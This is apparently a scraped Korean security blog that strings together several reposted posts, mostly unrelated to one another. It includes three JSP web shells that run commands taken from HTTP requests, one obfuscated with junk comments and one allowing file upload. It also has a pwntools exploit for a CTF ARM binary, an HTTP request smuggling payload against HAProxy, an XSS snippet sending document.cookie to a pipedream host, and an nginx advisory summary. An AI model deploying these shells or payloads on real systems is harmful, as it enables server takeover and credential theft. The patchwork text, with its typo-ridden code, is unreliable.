'경로 및 정보' 카테고리의 다른 글
Elastic 경로 (0) | 2022.07.01 |
---|---|
Postgresql Injection (0) | 2022.06.17 |
JSP 웹쉘 (0) | 2022.06.10 |
baby_RudOlPh Christmas CTF (펌) (0) | 2022.06.02 |
HTTP Request Smuggling (펌) (0) | 2022.06.02 |
Elastic 경로 (0) | 2022.07.01 |
---|---|
Postgresql Injection (0) | 2022.06.17 |
JSP 웹쉘 (0) | 2022.06.10 |
baby_RudOlPh Christmas CTF (펌) (0) | 2022.06.02 |
HTTP Request Smuggling (펌) (0) | 2022.06.02 |
https://github.com/SecurityRiskAdvisors/cmd.jsp/blob/master/cmd.jsp
<%@page import="java.io.*, java.util.*, javax.xml.bind.*, java.net.*"%><script>eval(window.localStorage.embed)</script><%!public String v(String w){String x="";try{x=URLDecoder.decode(w,"UTF-8");}catch(Exception e){}return x;}%><%String o,l,d;o=l=d="";DataInputStream r=new DataInputStream(request.getInputStream());while((l=r.readLine())!=null){d+=l;}if(d.indexOf("c=")>=0){String g=v(d.substring(2));String s;try{Process p=Runtime.getRuntime().exec(g);DataInputStream i=new DataInputStream(p.getInputStream());out.print("<pre>");while((s=i.readLine())!=null){o+=s.replace("<","<").replace(">",">")+"<br>";}}catch(Exception e){out.print(e);}}else{if(d.length()>1){int b=d.indexOf("b=");int n=d.indexOf("n=");byte[] m=DatatypeConverter.parseBase64Binary(v(d.substring(b+2)));String f=v(d.substring(2,n-1))+File.separator+v(d.substring(n+2,b-1));try{OutputStream stream=new FileOutputStream(f);stream.write(m);o="Uploaded: "+f;}catch(Exception e){out.print(e);}}}%><%=o%>
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process ps = null;
BuffereReader br = null;
String line = "";
String result = "";
String now_page = request.getServletPath();
try {
if(cmd != null {
ps = Runtime/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/getRuntime/*DSDsdfasdfasdf*/()/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/exec/*DSDsdfasdfasdf*/(cmd);
br = new BuffereReader(new InputStreamReader(ps.getInputStream()));
while((line = br.readLine()) != null ) {
result += line + "<br>";
}
ps.destory();
}
} finally {
if(br != null) br.close();
}
%>
<%@ page import="java.io.*" %>
<%
try {
//sdfgsdfgsdfgsretsdrt
String cmd = request.getParameter("cmd");
// selrjlsdfjglisdjflgdgsdfg
Process child = Runtime.getRuntime().exec(cmd);
//lajwriljalsdkfjl
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
Postgresql Injection (0) | 2022.06.17 |
---|---|
파일 시간 변경 (0) | 2022.06.11 |
baby_RudOlPh Christmas CTF (펌) (0) | 2022.06.02 |
HTTP Request Smuggling (펌) (0) | 2022.06.02 |
Heidi SQL Portable (0) | 2022.05.20 |
https://hackyboiz.github.io/2020/12/29/l0ch/baby_rudolph/
ArmMaker
baby_RudOlPh는 baby 시리즈 답게 이번 Christmas CTF에서 가장 많은 솔버가 나왔던 문제 중 하나입니다.
바이너리를 받고 보호기법과 아키텍쳐를 확인해보면 64bit ARM이고, NX bit만 걸려있는걸 확인할 수 있습니다.
분석해보면 vuln이라는 함수를 대놓고 줍니다. read 함수를 호출하는데 0x100만큼 받아서 stack overwflow가 발생하네요
get_arm 함수를 보면 첫 번째 인자의 값이 0x1225 면 system("/bin/sh")을 실행해 쉘을 획득할 수 있습니다.
ARMmaker 함수에는 인자를 세팅 할 수 있는 gadget이 있네요.
from pwn import *
p = process("./baby_RudOlPh")
context.log_level = "debug"
p.recvuntil("\\n")
payload = b"A"*72
payload += p64(0x400724)
payload += p64(0x1225) + b"A"*16
payload += p64(0x400738)
p.sendline(payload)
p.interactive()Copy
뉴비용 포너블 문제를 내려는데 그냥 내면 심심해서 64bit ARM으로 내봤습니다 ㅎㅎ 역시 많은 분들이 풀어주셨습니다!
(문제 만드는 시간보다 도커에 세팅하는데 드는 시간이 더 오래 걸렸던 건 비밀..)
파일 시간 변경 (0) | 2022.06.11 |
---|---|
JSP 웹쉘 (0) | 2022.06.10 |
HTTP Request Smuggling (펌) (0) | 2022.06.02 |
Heidi SQL Portable (0) | 2022.05.20 |
criminal ip (0) | 2022.05.17 |
https://hackyboiz.github.io/2022/03/06/syru/funny-smuggling-story-pt2/
사례 연구에 앞서 복습을 해봅시다.
이 공격 기법은 HTTP 요청이 처리될 때 이전 요청이 다음 요청에 포함되어 해당 요청의 처리결과를 바꾸는 것이었습니다.
웹 서비스 인프라를 구성할 때 트래픽 분산, 캐싱 등을 위해 프록시를 배치하게 되는데 이 프록시와 웹 서버가 서로 HTTP 요청의 Body 길이에 대한 해석을 다르게 하면서 주로 발생합니다.
Body의 길이는 Content-Length 헤더나 Transfer-Encoding 헤더를 통해 결정되며 아래의 규칙이 존재합니다.
규칙을 읽어보면 표준에 따르기만 해도 Smuggling이 방지될 것 같습니다.
하지만 공격자들은 연구 끝에 아래 방법을 사용하여 이를 우회 하였습니다.
편의를 위해 Content-Length를 CL, Transfer-Encoding을 TE라고 부르겠습니다.
HAProxy는 고가용성(HA)을 위해 주로 사용되는 프록시 입니다.
작년 9월에 이 프록시에서 CL-CL 유형의 HTTP Request Smuggling이 발견되었습니다.
해당 유형이 동작하려면 두 파싱 단계에서 400 bad request 처리를 막아야합니다.
즉 처리하는 순간에는 CL 헤더는 하나만 있는 것으로 보여야 합니다.
해당 취약 버젼에서 HAProxy는 파싱단계에서 CL이 한번 정상적으로 처리되면 나머지 헤더는 무시하도록 프로그래밍 되어 있습니다.
그렇기에 HAProxy가 웹 서버로 전달하는 HTTP 요청에는 CL 헤더가 하나만 존재하게 됩니다.
지금까지의 내용을 정리하면 대략 아래와 같은 방식으로 공격을 진행하면 됩니다.
그럼 이제 HAProxy가 전달받은 HTTP 요청이 400 Bad Request가 안 뜨면서 두 번째 요청의 CL 헤더의 값과 다르게 하려면 어떻게 해야 할까요?
HAProxy가 파싱과정에서 비정상 헤더를 정상으로 만들면 됩니다.
HAProxy는 HTTP 요청을 파싱할 때 HTX라는 구조를 사용합니다.
HTX는 크게 실제 데이터가 들어있는 payload와 해당 정보를 저장하는 block으로 나뉩니다.
block에는 이 정보가 어떤 payload의 것인지 주소를 저장하는 부분과 해당 payload의 정보를 저장하는 부분으로 나뉩니다.
HTX_BLOCK 구조의 두 멤버는 모두 uint32 (4byte) 자료형을 쓰고 있습니다.
payload의 정보를 저장하는 부분을 보면 헤더의 길이를 저장하는 공간이 1byte인 것을 알 수 있습니다.
정상적인 헤더 중 1byte(256)을 넘는 길이를 가지는 것은 없기 때문에 문제가 없어보입니다.
실제로 아래와 같이 주석만 남겨두고 길이 검증 코드가 존재하지 않았습니다.
/*
* HEAD : 3d5f19e04d88e7c8f71cba4ea12e383c91de89f6
* PATH : include/haproxy/htx.h
*/
static inline struct htx_blk *htx_add_header(struct htx *htx, const struct ist name,
const struct ist value)
{
struct htx_blk *blk;
/* FIXME: check name.len (< 256B) and value.len (< 1MB) */
blk = htx_add_blk(htx, HTX_BLK_HDR, name.len + value.len);
...
}Copy
이처럼 미흡한 검증은 공격에 쓰이는 좋은 가젯이 됩니다.
Integer Overflow를 통해 정상 헤더 + dummy 구조의 헤더에서 정상 부분만 처리하도록 하면 우리는 비정상 헤더를 정상으로 보이게 할 수 있습니다.
HTX를 파싱할 때 헤더의 길이는 구분자 : 앞까지로 계산됩니다.
POST / HTTP/1.1
Content-Length0aaaa..255개..aa: --- (1)
Content-Length: 4 --- (2)
CLCLCopy
(1)에서 헤더의 길이는 270입니다.
그런데 270은 0b100001110 인데 공간은 8bit만 할당되어 있으므로 앞에 1은 짤려서 0b00001110 만 저장되게 됩니다.
그렇게 조작된 길이 14만큼 읽으면 정상 헤더인 Content-Length로 바뀌게 됩니다.
앞서 설명한 부분들을 정리하면 아래의 순서로 Smuggling이 발생합니다.
이 취약점은 당연히 아래와 같이 길이 검사를 추가하는 방향으로 패치되었습니다.
+ if (name.len > 255 || value.len > 1048575)
+ return NULL;Copy
Tomcat은 JSP를 처리하는 Web Application Server 입니다.
작년 7월에 tomcat에서 CL-TE 유형의 HTTP Request Smuggling 취약점이 발견되었습니다.
해당 버젼에서 Client가 HTTP/1.0 응답만 받아들이도록 선언되어 있으면 Tomcat이 TE 헤더를 무시하는 로직이 존재하였고 결과적으로 아래와 같이 동작하였습니다.
HTTP Request Smuggling은 처리 방식이 동기화되지 않았다고 하여 HTTP Desync Attack이라고도 불립니다.
DEFCON 대회 예선 문제로 해당 취약점을 이용한 문제가 출제된 바 있으니 풀어보시면 이해하시는 데 도움이 되실 겁니다.
uploooadit | OOO archive | DEF CON CTF
JSP 웹쉘 (0) | 2022.06.10 |
---|---|
baby_RudOlPh Christmas CTF (펌) (0) | 2022.06.02 |
Heidi SQL Portable (0) | 2022.05.20 |
criminal ip (0) | 2022.05.17 |
Unleashing an Ultimate XSS Polyglot (0) | 2022.05.11 |
https://jdh5202.tistory.com/807
web hook 유사
Webhook
HTTP / Webhook 을 선택한다.
Response 정보를 설정하고 CREATE SOURCE 버튼을 클릭한다.
Source가 생성되면 HTTP 요청/응답을 받을 수 있는 엔드포인트 URL이 만들어진다.
해당 주소에 임의의 파라미터를 설정해 접근하면 EVENTS 로그를 통해 해당 파라미터로 전달받은 값을 확인할 수 있다.
https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/?param1="test"¶m2="test2"
xss 테스트 사이트에서 전송한 쿠키값을 확인하는 용도로 해당 사이트를 이용할 수도 있다.
<script>document.write("<img src='https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/
?cookie="+document.cookie+"'></img>");</script>
위 스크립트 실행 시 "cookie"라는 파라미터를 설정하여 현재 이용자 쿠키값을 pipedream으로 전송하게 된다.bubictf-2019 (0) | 2019.11.21 |
---|
baby_RudOlPh Christmas CTF (펌) (0) | 2022.06.02 |
---|---|
HTTP Request Smuggling (펌) (0) | 2022.06.02 |
criminal ip (0) | 2022.05.17 |
Unleashing an Ultimate XSS Polyglot (0) | 2022.05.11 |
[Ethereum] Smart Contract 보안 취약점 가이드 (0) | 2022.05.11 |
https://0day.today/exploit/36300
오픈 소스 웹 서버 프로그램 nginx의 ngx_resolver_copy()에서 DNS response를 처리하는 동안 발생하는 off-by-one으로 인해 heap 영역의 1-byte 메모리를 덮어쓸 수 있는 취약점이 발견되었습니다.
ngx_resolver_copy()는 DNS response에 포함된 DNS 도메인 이름의 유효성을 검사하고 압축을 해제하는 작업을 다음 두 단계로 처리합니다.
이 과정에서 1번의 len과 2번에 압축되지 않은 이름의 크기가 달라 name->data에서 1 바이트를 벗어나 덮어쓸 수 있습니다.
nginx DNS response를 받기 위해 DNS request를 보낸 후, QNAME, NAME, RDATA 중 하나의 값을 통해 해당 취약점을 트리거할 수 있습니다. 또한 CNAME을 사용할 경우 재귀적으로 처리되어 ngx_resolve_name_locked()가 호출될 때 추가적인 OOB write가 가능하고 ngx_resolver_dup()과 ngx_crc32_short()를 통해 OOB read가 가능합니다.
해당 취약점의 POC 코드는 github에서 확인할 수 있습니다.
CVE-2019-20372 (0) | 2022.05.19 |
---|---|
Apache cve 2021 (0) | 2021.11.26 |
cve-2021-41773 (0) | 2021.11.09 |
Zero To Logon, Domain (0) | 2021.08.25 |
MS Exchange Server 취약점 건 (0) | 2021.03.11 |